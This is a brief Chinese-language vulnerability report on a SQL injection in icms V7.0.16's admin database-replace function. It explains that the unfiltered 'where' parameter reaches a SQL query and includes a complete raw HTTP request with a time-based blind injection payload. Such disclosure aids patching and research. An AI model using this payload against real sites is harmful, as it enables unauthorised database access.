icms V7.0.16 后台数据管理处sql注入
2、有问题代码:database.admincp.php中的230行
3、219行传入的where参数,不经过过滤,直接带入230行中的sql执行语句
4、所以在参数where进行拼接,造成where条件句sql注入,尝试进行手工注入,数据包如下
POST /icms/admincp.php?app=database&do=query&frame=iPHP&CSRF_TOKEN=fe334f6fgxSmDHDpZeekNtohnt-hBYXBAOJkd5xXq_XXz5vaYOwEoS_nJrEdZo26EJVC0fA0SkLpfBFFzcE4ly18oxAoBMoCTr22qJ8 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Origin: http://localhost
Connection: close
Referer: http://localhost/icms/admincp.php?app=database&do=replace
Cookie: iCMS_ADMIN_AUTH=23f0a4caAp2o-gYF7T1PFGTY0fdLZd43ZdGHuQY1NnyOjOUDHZxyC_CewgaX5uR1iNHfEz_Pj20qTaPC_NZlv9CKoxpPtJ80fBz7nbiMensa6tkGlbYrpw; XDEBUG_SESSION=11807
Upgrade-Insecure-Requests: 1
field=tkd&pattern=123123&replacement=1231321&where=where+id=1+AND+(SELECT+*+FROM+(SELECT(SLEEP(10)))testsql)